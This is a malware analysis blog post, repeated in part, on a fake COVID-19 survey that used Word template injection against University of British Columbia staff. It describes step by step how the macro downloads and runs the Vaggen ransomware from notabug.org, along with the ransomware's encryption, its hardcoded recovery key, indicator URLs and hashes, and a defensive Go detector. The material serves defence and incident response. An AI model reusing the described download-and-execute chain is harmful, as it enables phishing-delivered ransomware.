A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1279 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1280 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1281 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1282 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1283 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1284 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1285 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1286 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1287 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1288 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1289 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1290 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1291 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1292 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1293 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1294 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1295 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1296 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1297 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1298 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1299 of 
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f
Variant3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp
Variant4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe
Variant5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a

This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we have observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful, due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly via email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters, which would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam sent through file sharing services without generating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. The shared .docx therefore carries no VBA of its own: it holds an external relationship pointing at the template, which Word resolves when the document is opened, so the macro only arrives once the file is already past mail and upload scanning.
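The external-relationship indicator just described is something an analyst can check for directly. The Go program below is an added example, not code from the post, from Malwarebytes or from the campaign: it opens a .docx (an OOXML ZIP), scans every .rels part for an attachedTemplate relationship whose Target is remote, and returns the URLs it finds. The two sample documents are built in memory and are constructed test input; the notabug.org repository path in InjectedSample is an assumption that only mirrors the hosting pattern reported above. Note the caveat in isRemote: a document created from a user's own template also carries an External attachedTemplate relationship, but its Target is a local file:///C:\... path, so flagging on TargetMode alone would produce false positives.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"strings"
)

// relationships maps the parts of an OOXML .rels file that matter here.
// encoding/xml matches elements by local name, so the default namespace on
// <Relationships> needs no declaration in the struct tags.
type relationships struct {
	Rels []struct {
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// isRemote reports whether a relationship Target points off the local machine.
// A document created from a user template legitimately carries an External
// attachedTemplate relationship, but its Target is a file:///C:\... path; an
// http(s) URL or a UNC path is the injection case.
func isRemote(target string) bool {
	lower := strings.ToLower(target)
	return strings.HasPrefix(lower, "http://") ||
		strings.HasPrefix(lower, "https://") ||
		strings.HasPrefix(target, `\\`)
}

// RemoteTemplates opens a .docx (a ZIP container) held in memory and returns
// the Target of every attachedTemplate relationship that points at a remote
// location. Word resolves that reference when the document is opened, which
// is how a macro-free .docx ends up loading a macro-enabled .dotm.
func RemoteTemplates(docx []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, fmt.Errorf("not a ZIP/OOXML container: %w", err)
	}
	var found []string
	for _, f := range zr.File {
		// The reference normally sits in word/_rels/settings.xml.rels, but every
		// .rels part is scanned so a relocated one is not missed.
		if !strings.HasSuffix(f.Name, ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		data, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(data, &rels); err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		for _, r := range rels.Rels {
			if strings.HasSuffix(r.Type, "/attachedTemplate") &&
				r.TargetMode == "External" && isRemote(r.Target) {
				found = append(found, r.Target)
			}
		}
	}
	return found, nil
}

const tmplType = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

// buildDocx assembles a minimal, constructed .docx in memory around the given
// attachedTemplate Target. It is test input, not a file from the campaign.
func buildDocx(target string) []byte {
	rels := `<?xml version="1.0" encoding="UTF-8"?>` +
		`<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">` +
		`<Relationship Id="rId1" Type="` + tmplType + `" Target="` + target + `" TargetMode="External"/>` +
		`</Relationships>`
	parts := []struct{ name, body string }{
		{"[Content_Types].xml", `<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>`},
		{"word/document.xml", `<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>`},
		{"word/_rels/settings.xml.rels", rels},
	}
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for _, p := range parts {
		w, err := zw.Create(p.name)
		if err != nil {
			panic(err)
		}
		if _, err := w.Write([]byte(p.body)); err != nil {
			panic(err)
		}
	}
	if err := zw.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

// InjectedSample mirrors the hosting pattern in the post (a .dotm served raw from
// a free code-hosting site); the repository path itself is an assumption.
func InjectedSample() []byte {
	return buildDocx("https://notabug.org/example/repo/raw/master/template.dotm")
}

// CleanSample is what a document based on a normal local template looks like.
func CleanSample() []byte {
	return buildDocx(`file:///C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm`)
}
```

Run RemoteTemplates over a quarantined attachment before anyone opens it; a non-empty result is worth blocking on its own, and the returned URL is the next thing to pull into a sandbox. The UNC prefix is included because a template served from an SMB share is the same mechanism with a different transport.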
The remote template (template.dotm) was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

Gets the %APPDATA% directory
Creates the Byxor directory in %APPDATA%
Downloads a file from the following URL and writes it as Polisen.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
Downloads a file from the following URL and writes it as Killar.exe:
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
Calls the Shell function to execute killar.exe
Checks the return value of Shell to see whether the launch succeeded (on success, Shell returns the task ID of the started process)
If successful, it sends an HTTP GET request to:
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
If it is not successful, it sends an HTTP GET request to:
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document (and letting the macro run) triggers a notification via the canarytokens.com website. Typically, people use this type of service to get alerted when a particular event occurs.

This can be very useful as an early warning system that an intruder has had access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user's files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, which starts with the function denoted as 'main_main'.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. The ones involved in file encryption map as follows:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded ("STALKER"). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming the files is implemented as the callback of the standard Go function filepath.Walk (package path/filepath).

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption routine is similar to the one demonstrated here.
The AES key is hardcoded in the binary and the 12-byte nonce is generated with CryptGenRandom; the file content is encrypted with the gcm.Seal function.

The content of the output file (with the .VAGGEN extension) is, in order:
the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key "du_tar_mitt_hjart_mina_pengarna0" found inside the malware code is Swedish for "you take my heart my money" (the trailing 0 pads the phrase to the 32 bytes AES-256 requires). Using this key, we can easily decrypt the content. Because the same key is compiled into every copy of the binary, with no per-victim key generation or exchange, anyone holding a sample can decrypt any file this build encrypted.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low and, unlike with professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It's unclear at this point whether the University of British Columbia was the sole target.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia. This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variants 1 and 4 share the same repository, canary tokens and irving.exe hash; only their alderson.exe payload differs.

Variant1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
